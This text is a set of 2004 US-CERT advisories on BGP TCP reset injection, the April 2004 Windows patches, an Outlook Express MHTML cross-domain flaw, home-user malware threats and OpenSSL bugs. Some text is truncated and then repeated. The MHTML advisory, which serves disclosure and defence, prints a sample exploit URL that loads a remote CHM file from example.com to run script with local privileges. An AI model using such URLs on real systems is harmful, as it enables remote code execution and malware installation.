an attacker were to send a Reset (RST) packet for example, they would
cause the TCP session between two endpoints to terminate without any
further communication.

The Border Gateway Protocol (BGP) is used to exchange routing
information for the Internet and is primarily used by Internet Service
Providers (ISPs). For detailed information about BGP and some tips for
securing it, please see Cisco
System's documentation or Team
Cymru. A vulnerable situation arises due to the fact that BGP relies on
long-lived persistent TCP sessions with larger window sizes to
function. When a BGP session is disrupted, the BGP application
restarts and attempts to re-establish a connection to its peers. This
may result in a brief loss of service until the fresh routing tables
are created.

In a TCP session, the endpoints can negotiate a TCP Window size. When
this is taken into account, instead of attempting to send a spoofed
packet with all potential sequence numbers, the attacker would only
need to calculate a valid sequence number that falls within the next
expected ISN plus or minus half the window size. Therefore, the larger
the TCP Window size, the the larger the range of sequence numbers that
will be accepted in the TCP stream. According to Paul Watson's report,
with a typical xDSL data connection (80 Kbps, upstream) capable of
sending of 250 packets per second (pps) to a session with a TCP Window
size of 65,535 bytes, it would be possible to inject a TCP packet
approximately every 5 minutes. It would take approximately 15 seconds
with a T-1 (1.544 Mbps) connection. These numbers are significant when
large numbers of compromised machines (often called "botnets" or
"zombies") can be used to generate large amounts of packets that can
be directed at a particular host.

To protect against such injections, RFC 2385 provides a method of
using MD5 signatures on the TCP Headers. If this form of verification
is supported and enabled between two peers, then an attacker would
have to obtain the key used to transmit the packet in order to
successfully inject a packet into the TCP session. Another alternative
would be to tunnel BGP over IPSec. Again, this would provide a form of
authentication between the BGP peers and the data that they transmit.
The lack of authentication when using TCP for BGP makes this type of
attack more viable.

US-CERT is tracking this issue as VU#415294. This
reference number corresponds to CVE candidate CAN-2004-0230.

NISCC is tracking this issue as Vulnerability Advisory 236929.

Impact

Sustained exploitation of the TCP injection vulnerability with regard to
the BGP vulnerability could lead to a denial-of-service condition that
could affect a large segment of the Internet community. Normal operations
would most likely resume shortly after the attack stopped.

Since the TCP/IP Initial
Sequence Number vulnerability (VU#498440) has been proven more viable
of an attack, any services or sites that rely on persistent TCP sessions
could also be affected by this vulnerability. Impacts could range from
data corruption or session hijacking to a denial-of-service condition.

Solution Apply a patch from your vendor

Please see your vendor's statement regarding the availability of
patches, updates and mitigation strategies.

Workaround Deploy and Use Cryptographically Secure Protocols

TCP initial sequence numbers were not designed to provide proof against
TCP connection attacks. The lack of cryptographically-strong security
options for the TCP header itself is a deficiency that technologies like
IPSec try to address. It must be
noted that in the final analysis that if an attacker has the ability to
see unencrypted TCP traffic generated from a site, that site is vulnerable
to various TCP attacks - not just those mentioned here. A stronger measure
that would aid in protecting against such TCP attacks is end-to-end
cryptographic solutions like those outlined in various IPSec documents.

The key idea with an
end-to-end cryptographic solution is that there is some secure
verification that a given packet belongs in a particular stream.
However, the communications layer at which this cryptography is
implemented will determine its effectiveness in repelling ISN based
attacks. Solutions that operate above the Transport Layer (OSI Layer 4),
such as SSL/TLS and SSH1/SSH2, only prevent arbitrary packets from being
inserted into a session. They are unable to prevent a connection reset
(denial of service) since the connection handling will be done by a lower
level protocol (i.e., TCP). On the other hand, Network Layer (OSI Layer
3) cryptographic solutions such as IPSec prevent both arbitrary packets
entering a transport-layer stream and connection resets because connection
management is directly integrated into the secure Network Layer security
model.

The solutions presented above have the desirable attribute of not
requiring any changes to the TCP protocol or implementations to be made.
Some sites may want to investigate hardening the TCP transport layer
itself. RFC2385 ("Protection of
BGP Sessions via the TCP MD5 Signature Option") and other technologies
provide options for adding cryptographic protection within the TCP header
at the cost of some potential denial of service, interoperability, and
performance issues.

Ingress filtering

Ingress filtering manages
the flow of traffic as it enters a network under your administrative
control.

You can configure your BGP routers to only accept packets on a specific
network connection.

Servers are typically the only machines that need to accept inbound
connections from the public Internet.

In the network usage policy of many sites, there are few reasons for
external hosts to initiate inbound connections to machines that provide no
public services.

Thus, ingress filtering should be performed at the border to prohibit
externally initiated inbound connections to non-authorized services.

In this fashion, the effectiveness of many intruder scanning techniques
can be dramatically reduced.

Network Isolation

Complex networks can benefit by separating data channels and control
channels, such as BGP, into different logical or physical
networks. Technologies such as VLANs, VPNs, leased links, and NAT may all
be able to contribute to separating the tranmission of control
information from the transmission of the data stream.

Egress filtering

Egress filtering manages the flow of traffic as it leaves a network
under your administrative control.

There is typically limited need for machines providing public services to
initiate outbound connections to the Internet.

In the case of BGP, only your BGP routers should be establishing
connections to your peers. Other BGP traffic generated on your network
could be a sign of an attempted attack.

Appendix A. Vendor Information

For vendor information, please see NISCC Vulnerability Advisory 236929
or US-CERT Vulnerability Note VU#415294. As
vendors report new information to US-CERT, we will update the
vulnerability note. If a particular vendor is not listed in either
the NISCC advisory, or the vulnerability, we recommend that you
contact them for their comments.

US-CERT thanks Paul Watson, Cisco Systems and NISCC for notifying us
about this problem and for helping us to construct this advisory.

Feedback can be directed to the US-CERT
Technical Staff.

Revision History

• April 20, 2004: Initial release
  
  September 9, 2005: Updated NISCC references
  

  Last updated

Systems Affected  

Systems running Microsoft Windows

  Overview  

There are multiple vulnerabilities in Microsoft Windows that could allow attackers to take control of your computer.

  Description  

Microsoft has released Windows Security Updates for April 2004, which addresses multiple vulnerabilities in the Microsoft Windows operating system. Three of the four updates are considered critical, so users should apply the updates as soon as possible.

A technical description of these vulnerabilities is available from US-CERT in TA04-104A and from Microsoft in MS04-011, MS04-012, MS04-013, and MS04-014.

Resolution Apply a patch

Follow the procedures outlined in Microsoft's Windows Security Updates for April 2004.

References

• US-CERT Technical Alert TA04-104A: Multiple Vulnerabilities in Microsoft Products - <http://www.us-cert.gov/cas/techalerts/TA04-104A.html>
• Microsoft's Windows Security Update for April 2004 - <http://www.microsoft.com/security/security_bulletins/200404_windows.asp>
• Microsoft Security Bulletin MS04-011 - <MS04-011>
• Microsoft Security Bulletin MS04-012 - < MS04-012>
• Microsoft Security Bulletin MS04-013 - <MS04-013>
• Microsoft Security Bulletin MS04-014 - <MS04-014>

Feedback about this alert should be sent to the author, Mindi McDowell, at "US-CERT Security Alerts" at <mailto:[email protected]>. Please include the Subject line "SA04-104A Feedback VU#667571".

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• April 13, 2004: Initial release

  Last updated 

Systems Affected  

• Microsoft Windows Operating Systems
• Microsoft Windows Remote Procedure Call (RPC) and Distributed Component Object Model (DCOM) subsystems
• Microsoft Windows MHTML Protocol Handler
• Microsoft Jet Database Engine

  Overview  

Microsoft Corporation has released a series of security bulletins affecting most users of the Microsoft Windows operating system. Users of systems running Microsoft Windows are strongly encouraged to visit the Windows Security Updates for April 2004 and take actions appropriate to their system configurations.

  Description  

Microsoft has released four security bulletins listing a number of vulnerabilities which affect a variety of Microsoft Windows software packages. The following section summarizes the issues identified in their bulletins.

Summary of Microsoft Bulletins for April 2004 Security Bulletin MS04-011: Security Update for Microsoft Windows (835732)

This bulletin addresses 14 vulnerabilities affecting the systems listed below. There are several new vulnerabilities address by this bulletin, and several updates to previously reported vulnerabilities.

Impact

Remote attackers could execute arbitrary code on vulnerable systems.

 

Systems affected

• Windows NT Workstation 4.0
• Windows NT Server 4.0
• Windows NT Server 4.0, Terminal Server Edition
• Windows 2000
• Windows XP
• Windows Server 2003

 

Vulnerability identifiers 

The following table outlines these issues and is based on Microsoft's Security Bulletin:

 

Vulnerability Title US-CERT ID CVE ID Impact of Vulnerability LSASS Vulnerability VU#753212

CAN-2003-0533

 

Remote Code Execution LDAP Vulnerability VU#639428

CAN-2003-0663

 

Denial of Service PCT Vulnerability VU#586540

CAN-2003-0719

 

Remote Code Execution Winlogon Vulnerability VU#471260

CAN-2003-0806

 

Remote Code Execution Metafile Vulnerability VU#547028

CAN-2003-0906

 

Remote Code Execution Help and Support Center Vulnerability VU#260588

CAN-2003-0907

 

Remote Code Execution Utility Manager Vulnerability VU#526084

CAN-2003-0908

 

Privilege Elevation Windows Management Vulnerability VU#206468

CAN-2003-0909

 

Privilege Elevation Local Descriptor Table Vulnerability VU#122076

CAN-2003-0910

 

Privilege Elevation H.323 Vulnerability VU#353956

CAN-2004-0117

 

Remote Code Execution Virtual DOS Machine Vulnerability VU#783748

CAN-2004-0118

 

Privilege Elevation Negotiate SSP Vulnerability VU#638548

CAN-2004-0119

 

Remote Code Execution SSL Vulnerability VU#150236

CAN-2004-0120

 

Denial of Service ASN.1 "Double Free" Vulnerability VU#255924

CAN-2004-0123

 

Remote Code Execution  

 

Security Bulletin MS04-012: Cumulative Update for Microsoft RPC/DCOM (828741)

This bulletin addresses several new vulnerabilities affecting the systems listed below. These vulnerabilities are in Microsoft Windows Remote Procedure Call (RPC) and Distributed Component Object Model (DCOM).

Impact

Remote attackers could execute arbitrary code on vulnerable systems.

 

Systems affected

• Windows NT Workstation 4.0
• Windows NT Server 4.0
• Windows NT Server 4.0, Terminal Server Edition
• Windows 2000
• Windows XP
• Windows Server 2003

 

Vulnerability identifiers 

The following table outlines these issues and is based on Microsoft's Security Bulletin:

 

Vulnerability Title US-CERT ID CVE ID Impact of Vulnerability RPC Runtime Library Vulnerability VU#547820

CAN-2003-0813

 

Remote Code Execution RPCSS Service Vulnerability VU#417052

CAN-2004-0116

 

Denial of Service COM Internet Services (CIS) -- RPC over HTTP Vulnerability VU#698564

CAN-2003-0807

 

Denial of Service Object Identity Vulnerability VU#212892

CAN-2004-0124

 

Information Disclosure   Security Bulletin MS04-013:Cumulative Security Update for Outlook Express (837009)

This bulletin addresses a vulnerability affecting the systems listed below. The vulnerability affects the Microsoft Windows MHTML Protocol handler and any applications that use it, including Microsoft Outlook and Internet Explorer. This vulnerability has been assigned VU#323070 and CAN-2004-0380. 

Note: MS04-013 includes patches remediating the vulnerability described in TA04-099A.
 

Impact

Remote attackers could execute arbitrary code on vulnerable systems.

 

Systems affected

• Windows NT Workstation 4.0
• Windows NT Server 4.0
• Windows NT Server 4.0, Terminal Server Edition
• Windows 2000
• Windows XP
• Windows Server 2003
• Windows 98
• Windows 98 Second Edition (SE)
• Windows Millennium Edition (Windows Me)

 

Note: This issue affects systems with Outlook Express installed. Outlook Express is installed by default on most (if not all) current versions of Microsoft Windows.

Security Bulletin MS04-014: Vulnerability in the Microsoft Jet Database Engine Could Allow Code Execution (837001)

This bulletin addresses a vulnerability affecting the systems listed below. There is a buffer overflow vulnerability in Microsoft's Jet Database Engine (Jet). An attacker could take control of a vulnerable system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges. This vulnerability has been assigned VU#740716 and CAN-2004-0197.

Impact

Remote attackers could execute arbitrary code on vulnerable systems.

 

Systems affected

• Windows NT Workstation 4.0
• Windows NT Server 4.0
• Windows NT Server 4.0, Terminal Server Edition
• Windows 2000
• Windows XP
• Windows Server 2003

 

 

Update to TA04-099A

Microsoft has released a patch that addresses the cross-domain vulnerability discussed in TA04-099A: Vulnerability in Internet Explorer ITS Protocol Handler. US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380.

The patches and further information about the vulnerability are available in Microsoft Security Bulletin MS04-013. MS04-013 is titled Cumulative Security Update for Outlook Express. Since most (if not all) current Windows systems have Outlook Express installed by default, and the MHTML protocol handler is part of the Outlook Express software package, most (if not all) Windows systems should be considered vulnerable.

TA04-099A and VU#323070 focused on the ITS protocol handlers; however, the latent vulnerability appears to be in the MHTML handler shipped as part of Outlook Express. These documents have been updated.

Impact

Several of the issues identified by Microsoft have been described as Critical in nature. Each bulletin contains at least one vulnerability which may allow remote attackers to execute arbitrary code on affected systems. The privileges gained would depend on the security context of the software and vulnerability exploited.

Solution Apply an appropriate set of updates from Microsoft

Please see the following site for more information about appropriate remediation.

Windows Security Updates for April 2004

Appendix A. Vendor Information

This appendix contains information provided by vendors for this technical alert. As vendors report new information to US-CERT, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Microsoft Corporation

Windows Security Updates for April 2004
Microsoft Security Bulletin MS04-011 - Security Update for Microsoft Windows (835732)
Microsoft Security Bulletin MS04-012 - Cumulative Update for Microsoft RPC/DCOM (828741)
Microsoft Security Bulletin MS04-013 - Cumulative Security Update for Outlook Express (837009)
Microsoft Security Bulletin MS04-014 - Vulnerability in the Microsoft Jet Database Engine Could Allow Code Execution (837001)

 

Appendix B. References

• Technical Cyber Security Alert TA04-099A: Cross-Domain Vulnerability in Outlook Express MHTML Protocol Handler - http://www.us-cert.gov/cas/techalerts/TA04-099A.html
• US-CERT Cyber Security Alert SA04-104A: Summary of Windows Security Updates for April 2004 - http://www.us-cert.gov/cas/alerts/SA04-104A.html
• Windows Security Updates for April 2004 - http://www.microsoft.com/security/security_bulletins/200404_windows.asp
• Microsoft Security Bulletin MS04-011 - Security Update for Microsoft Windows (835732) - http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
• Microsoft Security Bulletin MS04-012 - Cumulative Update for Microsoft RPC/DCOM (828741) - http://www.microsoft.com/technet/security/bulletin/MS04-012.mspx
• Microsoft Security Bulletin MS04-013 - Cumulative Security Update for Outlook Express (837009) - http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx
• Microsoft Security Bulletin MS04-014 - Vulnerability in the Microsoft Jet Database Engine Could Allow Code Execution (837001) - http://www.microsoft.com/technet/security/bulletin/MS04-014.mspx
• Microsoft Security Response Center Security Bulletin Severity Rating System (Revised, November 2002) - http://www.microsoft.com/technet/security/bulletin/rating.mspx
• Vulnerability Note VU#323070: Outlook Express MHTML protocol handler does not properly validate location of alternate data - http://www.kb.cert.org/vuls/id/323070
• Vulnerability Note VU#547820: Microsoft Windows DCOM/RPC vulnerability - http://www.kb.cert.org/vuls/id/547820
• Vulnerability Note VU#740716: Microsoft Jet Database Engine database request handling buffer overflow - http://www.kb.cert.org/vuls/id/740716

 

Feedback: US-CERT Technical Alerts

Revision History

• April 13, 2004: Initial release
  April 14, 2004: Updated Vulnerability Note links
   

  Last updated 

Systems Affected  

• Microsoft Windows systems

  Overview  

A cross-domain vulnerability in the Outlook Express MIME Encapsulation of Aggregate HTML Documents (MHTML) protocol handler could allow an attacker to execute arbitrary code with the privileges of the user invoking the handler. The attacker may also be able to read and manipulate data on web sites in other domains or zones.

  Description  

There is a cross-domain vulnerability in the way the Outlook Express MHTML protocol handler (mhtml:) determines the security domain of data referenced by a URL that specifies an alternate location. When the MHTML handler references an inaccessible or non-existent file, the handler can access a file from an alternate location. The MHTML handler incorrectly treats the file from the alternate location as if it were in the same domain as the unavailable file.

The MHTML protocol handler is considered to be part of Outlook Express and is installed by default on all current Windows systems. The MHTML protocol handler is effectively a shared Windows component. Any program that exposes an MHTML protocol reference to the operating system will invoke the handler, typically using Internet Explorer (IE).

Programs that use the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Internet Explorer, Outlook, and Outlook Express are all examples of such programs.

 

US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380.

Impact

By convincing a victim to view an HTML document such as a web page or HTML email message, an attacker could access data or execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user invoking the MHTML handler. The attacker may also be able to read or modify data in other web sites (including reading cookies or content and modifying or creating content).

Publicly available exploit code exists for this vulnerability. US-CERT has monitored incident reports that indicate that this vulnerability is being exploited. The Ibiza trojan, variants of W32/Bugbear, and BloodHound.Exploit.6 are some examples of malicious code that exploit this vulnerability. Any arbitrary payload could be delivered via this vulnerability, and different anti-virus vendors may identify malicious code with different names.

Most of the observed exploit code uses InfoTech Storage (ITS) protocol handlers and Compiled HTML Help (CHM) files to parse an HTML file in the Local Machine Zone. CHM files use the InfoTech Storage (ITS) format to store components such as HTML files, graphic files, and ActiveX objects, and Windows provides several protocol handlers that can access ITS files and individual CHM components: its:, ms-its:, ms-itss:, and mk:@MSITStore:.

When referencing an inaccessible or non-existent MHTML file using the ITS and mhtml: protocols, IE can access a CHM file from an alternate location. Because of the vulnerability in the MHTML handler, IE incorrectly treats the CHM file as if it were in the same domain as the unavailable MHTML file. Using a specially crafted URL, an attacker can cause arbitrary script in a CHM file to be executed in a different domain, violating the cross-domain security model.

Any programs, including other web browsers, that use the Windows protocol handlers (URL monikers) for ITS or MHTML protocols could function as attack vectors. Also, due to the way that IE determines MIME types, HTML and CHM files may not have the expected file name extensions (.htm/.html and .chm respectively).

 

A malicious web site or email message may contain HTML similar to the following:

ms-_its:_mhtml:_file://C:\nosuchfile.mht!_http://www.example.com//exploit._chm::exploit.html 
(This URL is intentionally modified to avoid detection by anti-virus software.)

In this example, HTML and script in exploit.html will be executed in the security context of the Local Machine Zone. It is common practice for exploit.html to either contain or download an executable payload such as a backdoor, trojan horse, virus, bot, or other malicious code.

Note that it is possible to encode a URL in an attempt to bypass HTTP content inspection or anti-virus software.

 

Solution

Install a patch

Install the appropriate cumulative patch for Outlook Express according to Microsoft Security Bulletin MS04-013.

Disable ITS and MHTML protocol handlers

Disabling the ITS and MHTML protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk,mhtml}

Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.

 

Follow good Internet security practices

These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities. Additional recommendations can be found under Mitigating factors and Workarounds in the Vulnerability Details section of MS04-013.

• Disable Active scripting and ActiveX controls
  
  NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.
  
  Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.
  
  Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.

   

• Do not follow unsolicited links

  Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.

• Maintain updated anti-virus software

  Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

Appendix A. Vendor Information

Microsoft Corporation

Please see Microsoft Security Bulletin MS04-013.

 

Appendix B. References

• Vulnerability Note VU#323070 - <http://www.kb.cert.org/vuls/id/323070>
• US-CERT Computer Virus Resources - <http://www.us-cert.gov//reading_room/virus.html>
• CVE CAN-2004-0380 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
• Microsoft Security Bulletin MS04-013 - <http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx>
• Introduction to URL Security Zones - <http://msdn.microsoft.com/workshop/security/szone/overview/overview.asp>
• About Cross-Frame Scripting and Security - <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp>
• MIME Type Determination in Internet Explorer - <http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp>
• URL Monikers - <http://msdn.microsoft.com/workshop/networking/moniker/monikers.asp>
• Asynchronous Pluggable Protocols - <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable.asp>
• Microsoft HTML Help 1.4 SDK - <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Start.asp>
• Microsoft Knowledge Base Article 182569 - <http://support.microsoft.com/default.aspx?scid=182569>
• Microsoft Knowledge Base Article 174360 - <http://support.microsoft.com/default.aspx?scid=174360>
• Microsoft Knowledge Base Article 833633 - <http://support.microsoft.com/default.aspx?scid=833633>
• Windows XP Service Pack 2 Technical Preview - <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx>
• AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>

 

This vulnerability was reported by Liu Die Yu. Thanks to http-equiv for additional research and collaboration.

Feedback can be directed to the author: Art Manion.

Revision History

• April 8, 2004: Initial release
  April 13, 2004: Added patch and vendor information (MS04-013), credited Liu Die Yu, updated vulnerability, impact, and workaround information about MHTML
  April 23. 2004: Thanked http-equiv April 26, 2004: Further modified sample exploit URL to minimize AV detection

  Last updated 

Systems Affected  

Continuing Threats to Home Users

View Previous Alerts

Alert (SA04-079A)

Continuing Threats to Home Users

Original Release date: March 19, 2004 | Last revised: --

Overview  

There are a number of pieces of malicious code spreading on the Internet through email attachments, peer-to-peer file sharing networks and known software vulnerabilities.

Intruders target home users who have cable modem and DSL connections because many home users do not keep their machines up to date with security patches and workarounds, do not run current anti-virus software, and do not exercise caution when handling email attachments. Everyone should take precautions, patch vulnerabilities, and recover if you have been compromised.

Current Threats

US-CERT is currently tracking the incident activity related to several pieces of malicious code - Phatbot, W32/Beagle, W32/Netsky and W32/MyDoom.

• Phatbot Trojan Horse

  The Phatbot Trojan Horse is a piece of malicious code that allows a remote attacker to control a large number of systems. Phatbot attempts to propagate by exploiting vulnerabilities in the Microsoft Windows operating system for which users have not applied the available patches. If your computer is infected a remote attacker will have access to your files and programs.

• W32/Beagle Virus

  The W32/Beagle virus is a mass-mailing virus that arrives as an attachment to an email message. To be infected, a user must open the attachment. There are many variants of this virus. Some may require a password which is included in the email message.

• W32/Netsky Virus

  The Netsky.B virus, described in IN-2004-02, is a mass-mailing virus that attempts to propagate either as an attachment to an email message or by copying itself to Windows network shares.

• W32/MyDoom Virus

  The MyDoom virus, described in TA04-028A, is a mass-mailing virus that attempts to propagate as an attachment to an email message.

Protective Measures

There are steps you can take to better protect your system from these attacks:

1. Apply Patches

   Many viruses spread by exploiting known vulnerabilities in unpatched systems. It is very important for users to apply security-related patches to their operating systems and applications.

2. Install and Maintain Anti-Virus Software

   US-CERT strongly recommends using anti-virus software. Most current anti-virus software products detect and alert the user of viruses. It is important to keep them up to date with current virus and attack signatures supplied by the software vendor. Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available.

3. Deploy a Firewall

   US-CERT also recommends using a firewall product. In some situations, these products may be able to alert users to the fact that their machine has been compromised. Furthermore, they have the ability to block intruders from accessing backdoors over the network. However, no firewall can detect or stop all attacks, so it is important to continue to follow safe computing practices.

4. Follow Best Practices

   The technical measures listed above do not provide a complete solution for securing a system. There are some best practices you can follow:

   • Do not download, install, or run a program unless you know it was written by a person or company that you trust.
   • Email users should be wary of unexpected attachments. Be sure you know the source of an attachment before opening it. Also remember that it is not enough that the mail originated from an email address you recognize. Many viruses spread precisely because they originate from a familiar email address.
   • Users should also be wary of URLs in email or instant messages. URLs can link to malicious content that in some cases may be executed without user intervention. A common social engineering technique known as "phishing" uses misleading URLs to entice users to visit malicious web sites. These sites spoof legitimate web sites to solicit sensitive information such as passwords or account numbers.
   • In addition, users of Internet Relay Chat (IRC), Instant Messaging (IM), and file-sharing services should be particularly careful of following links or running software sent to them by other users. These are commonly used methods among intruders attempting to build networks of distributed denial-of-service (DDoS) agents.

   For additional information about securing home systems and networks, please see the references below.

Recovery

If the protective measures above, or other indicators, reveal that a system has already been compromised, more drastic steps need to be taken to recover. In general, the only way to ensure that a compromised computer is free from backdoors and intruder modifications is to re-install t

  Description  

Continuing Threats to Home Users

View Previous Alerts

Alert (SA04-079A)

Continuing Threats to Home Users

Original Release date: March 19, 2004 

Overview

There are a number of pieces of malicious code spreading on the Internet through email attachments, peer-to-peer file sharing networks and known software vulnerabilities.

Intruders target home users who have cable modem and DSL connections because many home users do not keep their machines up to date with security patches and workarounds, do not run current anti-virus software, and do not exercise caution when handling email attachments. Everyone should take precautions, patch vulnerabilities, and recover if you have been compromised.

Current Threats

US-CERT is currently tracking the incident activity related to several pieces of malicious code - Phatbot, W32/Beagle, W32/Netsky and W32/MyDoom.

• Phatbot Trojan Horse

  The Phatbot Trojan Horse is a piece of malicious code that allows a remote attacker to control a large number of systems. Phatbot attempts to propagate by exploiting vulnerabilities in the Microsoft Windows operating system for which users have not applied the available patches. If your computer is infected a remote attacker will have access to your files and programs.

• W32/Beagle Virus

  The W32/Beagle virus is a mass-mailing virus that arrives as an attachment to an email message. To be infected, a user must open the attachment. There are many variants of this virus. Some may require a password which is included in the email message.

• W32/Netsky Virus

  The Netsky.B virus, described in IN-2004-02, is a mass-mailing virus that attempts to propagate either as an attachment to an email message or by copying itself to Windows network shares.

• W32/MyDoom Virus

  The MyDoom virus, described in TA04-028A, is a mass-mailing virus that attempts to propagate as an attachment to an email message.

Protective Measures

There are steps you can take to better protect your system from these attacks:

1. Apply Patches

   Many viruses spread by exploiting known vulnerabilities in unpatched systems. It is very important for users to apply security-related patches to their operating systems and applications.

2. Install and Maintain Anti-Virus Software

   US-CERT strongly recommends using anti-virus software. Most current anti-virus software products detect and alert the user of viruses. It is important to keep them up to date with current virus and attack signatures supplied by the software vendor. Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available.

3. Deploy a Firewall

   US-CERT also recommends using a firewall product. In some situations, these products may be able to alert users to the fact that their machine has been compromised. Furthermore, they have the ability to block intruders from accessing backdoors over the network. However, no firewall can detect or stop all attacks, so it is important to continue to follow safe computing practices.

4. Follow Best Practices

   The technical measures listed above do not provide a complete solution for securing a system. There are some best practices you can follow:

   • Do not download, install, or run a program unless you know it was written by a person or company that you trust.
   • Email users should be wary of unexpected attachments. Be sure you know the source of an attachment before opening it. Also remember that it is not enough that the mail originated from an email address you recognize. Many viruses spread precisely because they originate from a familiar email address.
   • Users should also be wary of URLs in email or instant messages. URLs can link to malicious content that in some cases may be executed without user intervention. A common social engineering technique known as "phishing" uses misleading URLs to entice users to visit malicious web sites. These sites spoof legitimate web sites to solicit sensitive information such as passwords or account numbers.
   • In addition, users of Internet Relay Chat (IRC), Instant Messaging (IM), and file-sharing services should be particularly careful of following links or running software sent to them by other users. These are commonly used methods among intruders attempting to build networks of distributed denial-of-service (DDoS) agents.

   For additional information about securing home systems and networks, please see the references below.

Recovery

If the protective measures above, or other indicators, reveal that a system has already been compromised, more drastic steps need to be taken to recover. In general, the only way to ensure that a compromised computer is free from backdoors and intruder modifications is to re-install the operating system and install patches before connecting back to the network. Sometimes using an anti-virus software package to "clean" the system may not be enough.

References

• Before You Connect a New Computer to the Internet - http://www.us-cert.gov/reading_room/before_you_plug_in.html
• Home Network Security - http://www.us-cert.gov/reading_room/home-network-security/
• Home Computer Security - http://www.us-cert.gov/reading_room/HomeComputerSecurity/
• Understanding Firewalls - http://www.us-cert.gov/cas/tips/ST04-004.html
• Good Security Habits - http://www.us-cert.gov/cas/tips/ST04-003.html
• Choosing and Protecting Passwords - http://www.us-cert.gov/cas/tips/ST04-002.html

Authors: Brian B. King, Damon Morda

Copyright 2004 Carnegie Mellon University. Terms of use

Revision History

• March 19, 2004: Initial release
   

Last updated 

Systems Affected  

• Applications and systems that use the OpenSSL SSL/TLS library

  Overview  

Several vulnerabilities in the OpenSSL SSL/TLS library could allow an unauthenticated, remote attacker to cause a denial of service.

  Description  

OpenSSL implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols and includes a general purpose cryptographic library. SSL and TLS are commonly used to provide authentication, encryption, integrity, and non-repudiation services to network applications including HTTP, IMAP, POP3, SMTP, and LDAP. OpenSSL is widely deployed across a variety of platforms and systems. In particular, many routers and other types of networking equipment use OpenSSL.

The U.K. National Infrastructure Security Co-ordination Centre (NISCC) and the OpenSSL Project have reported three vulnerabilities in the OpenSSL SSL/TLS library (libssl). Any application or system that uses this library may be affected.

VU#288574 - OpenSSL contains null-pointer assignment in do_change_cipher_spec() function

Versions of OpenSSL from 0.9.6c to 0.9.6k inclusive and 0.9.7a to 0.9.7c inclusive contain a null-pointer assignment in the do_change_cipher_spec() function. By performing a specially crafted SSL/TLS handshake, an attacker could cause OpenSSL to crash, which may result in a denial of service in the target application.
(Other resources: OpenSSL Security Advisory (1.), CAN-2004-0079, NISCC/224012/OpenSSL/1)

VU#484726 - OpenSSL does not adequately validate length of Kerberos tickets during SSL/TLS handshake

Versions 0.9.7a, 0.9.7b, and 0.9.7c of OpenSSL do not adequately validate the length of Kerberos tickets (RFC 2712) during an SSL/TLS handshake. OpenSSL is not configured to use Kerberos by default. By performing a specially crafted SSL/TLS handshake with an OpenSSL system configured to use Kerberos, an attacker could cause OpenSSL to crash, which may result in a denial of service in the target application. OpenSSL 0.9.6 is not affected.
(Other resources: OpenSSL Security Advisory (2.), CAN-2004-0112, NISCC/224012/OpenSSL/2)

VU#465542 - OpenSSL does not properly handle unknown message types

OpenSSL prior to version 0.9.6d does not properly handle unknown SSL/TLS message types. An attacker could cause the application using OpenSSL to enter an infinite loop, which may result in a denial of service in the target application. OpenSSL 0.9.7 is not affected.
(Other resources: CAN-2004-0081, NISCC/224012/OpenSSL/3)

Impact

An unauthenticated, remote attacker could cause a denial of service in any application or system that uses a vulnerable OpenSSL SSL/TLS library.

Solution Upgrade or Apply a patch from your vendor

Upgrade to OpenSSL 0.9.6m or 0.9.7d. Alternatively, upgrade or apply a patch as specified by your vendor. Note that it is necessary to recompile any applications that are statically linked to the OpenSSL SSL/TLS library.

Appendix A. Vendor Information

Multiple vendors are affected by different combinations of these vulnerabilities. For updated information, please see the Systems Affected sections of VU#288574, VU#484726, and VU#465542.

 

Appendix B. References

• US-CERT Technical Cyber Security Alert TA04-078A - <http://www.us-cert.gov/cas/techalerts/TA04-078A.html>
• Vulnerability Note VU#288574 - <http://www.kb.cert.org/vuls/id/288574>
• Vulnerability Note VU#484726 - <http://www.kb.cert.org/vuls/id/484726>
• Vulnerability Note VU#465542 - <http://www.kb.cert.org/vuls/id/465542>
• OpenSSL Security Advisory [17 March 2004] - <http://www.openssl.org/news/secadv_20040317.txt>
• NISCC Vulnerability Advisory 224012 - <http://www.uniras.gov.uk/vuls/2004/224012/index.htm>
